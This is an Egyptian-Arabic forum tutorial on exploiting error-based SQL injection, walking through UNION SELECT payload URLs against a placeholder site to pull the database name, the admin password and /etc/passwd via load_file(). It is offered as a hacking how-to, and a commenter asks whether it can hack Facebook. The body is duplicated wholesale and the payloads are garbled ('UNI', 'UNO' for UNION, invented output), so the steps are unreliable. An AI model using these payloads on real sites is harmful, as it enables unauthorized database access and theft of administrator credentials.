بسم الله الرحمن الرحيم
==============
استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()
=====================
بس قبل ما أبدأ إللى عجبه الشرح و عاوز ينقله ياريت يذكر المصدر لأن انا تعبت لما كتبته colonthree رمز تعبيري
==========================================
نفرض الموقع المستهدف
http://www.site.com/index.php?id=1
==============
استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()
=====================
بس قبل ما أبدأ إللى عجبه الشرح و عاوز ينقله ياريت يذكر المصدر لأن انا تعبت لما كتبته colonthree رمز تعبيري
==========================================
نفرض الموقع المستهدف
http://www.site.com/index.php?id=1
طبعا لكتشاف الخطاء هنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل
http://www.site.com/index.php?id=1'
طبعا القاعد لم تستطيع التعرف علي الرمز 1'
هيظهر الخطاء ان الامر خطاء
هيكون
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line
خطاء قواعد البيانات في الداله
Warning: mysql_fecth_array():
هنا يمكن الاستغلال مباشر لل SQL-injection
وفي نفس الوقت ظهر لينا مكان الموقع علي السيرفر
home/site/index.php
بنداء دلوقتي في تطبيق SQL-injection
UNION SELECT null
UNION والامر هذا يستخدم لإضافة استعلام اخر تابع للاستعلام المصاب بالثغره
SELECT : وهذا الامر عن طريقه يتم استخراج البيانات
Null : وهذا الامر لظبط عدد columns مع القاعده وطبعا بتفضل تزود null للربط بالقاعد
المهم شوف الفديو ده علي لكي تفهم
http://www.sec-area.com/Public/video/MYSQLROOT.rar
المهم بعد كده هنجرب نبداء ب null واحده
http://www.site.com/index.php?id=1%27UNI SELECT null
للاسف لم تربط بالقاعده هنجرب 2 null
http://www.site.com/index.php?id=1%27UNI SELECT null,null
كده ربط بالقاعده طيب دلوقتي عايزين نعرف Table في القاعده
بستخدام الامر DATABASE() وهنضيف الداله دفي اخر null
http://www.site.com/index.php?id=1%27UNI SELECT null,DATABASE()/
هيكون الناتج
CODEUSER()
PASSWORD()
VERSION
طبعا الجداول دي ايوزر بتاع اسم المستخدم و الباسورد بتاع باسورد الادمن
وهيكون الاستعلام لستخراج الباسورد
http://www.site.com/index.php?id=1%27UNO SELECT null,password
و امر استخراج اليوزر
http://www.site.com/index.php?id=1%27UNO SELECT null,password WHERE user='admin' /*
البعض هيقول طيب SQL-injection فاشله علي شان بتجيب الباسورد MD5
لكن هوريك امر يعتبر فيل انكلود وهو بستخدام الامر load_file()
وهيكون الاستعلام فيه
http://www.site.com/index.php?id=1%27UNO SELECT null,load_file('/etc/passwd')
و الامر ده هيعرض ليك PAsswd يعني يتم الاستغل فيل انكلود
او ممكن تفك التشفيره بطريقه أخرى بس شوف الفيديو ده
http://www.site.com/index.php?id=1'
طبعا القاعد لم تستطيع التعرف علي الرمز 1'
هيظهر الخطاء ان الامر خطاء
هيكون
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line
خطاء قواعد البيانات في الداله
Warning: mysql_fecth_array():
هنا يمكن الاستغلال مباشر لل SQL-injection
وفي نفس الوقت ظهر لينا مكان الموقع علي السيرفر
home/site/index.php
بنداء دلوقتي في تطبيق SQL-injection
UNION SELECT null
UNION والامر هذا يستخدم لإضافة استعلام اخر تابع للاستعلام المصاب بالثغره
SELECT : وهذا الامر عن طريقه يتم استخراج البيانات
Null : وهذا الامر لظبط عدد columns مع القاعده وطبعا بتفضل تزود null للربط بالقاعد
المهم شوف الفديو ده علي لكي تفهم
http://www.sec-area.com/Public/video/MYSQLROOT.rar
المهم بعد كده هنجرب نبداء ب null واحده
http://www.site.com/index.php?id=1%27UNI SELECT null
للاسف لم تربط بالقاعده هنجرب 2 null
http://www.site.com/index.php?id=1%27UNI SELECT null,null
كده ربط بالقاعده طيب دلوقتي عايزين نعرف Table في القاعده
بستخدام الامر DATABASE() وهنضيف الداله دفي اخر null
http://www.site.com/index.php?id=1%27UNI SELECT null,DATABASE()/
هيكون الناتج
CODEUSER()
PASSWORD()
VERSION
طبعا الجداول دي ايوزر بتاع اسم المستخدم و الباسورد بتاع باسورد الادمن
وهيكون الاستعلام لستخراج الباسورد
http://www.site.com/index.php?id=1%27UNO SELECT null,password
و امر استخراج اليوزر
http://www.site.com/index.php?id=1%27UNO SELECT null,password WHERE user='admin' /*
البعض هيقول طيب SQL-injection فاشله علي شان بتجيب الباسورد MD5
لكن هوريك امر يعتبر فيل انكلود وهو بستخدام الامر load_file()
وهيكون الاستعلام فيه
http://www.site.com/index.php?id=1%27UNO SELECT null,load_file('/etc/passwd')
و الامر ده هيعرض ليك PAsswd يعني يتم الاستغل فيل انكلود
او ممكن تفك التشفيره بطريقه أخرى بس شوف الفيديو ده
👇👇👇👇👇👇
لانحب السياسة ، ،
3 التعليقات
??? التعليقاتبحبكو اوي والله وشكران بس انتو مش بتنزلو حاجة جديدة لي ♥
????? ????دى تنفع تخترق الفيس
????? ????دى تنفع تخترق الفيس
????? ???????? ??????? ???? ??????? ????? ????????? ????? ?????????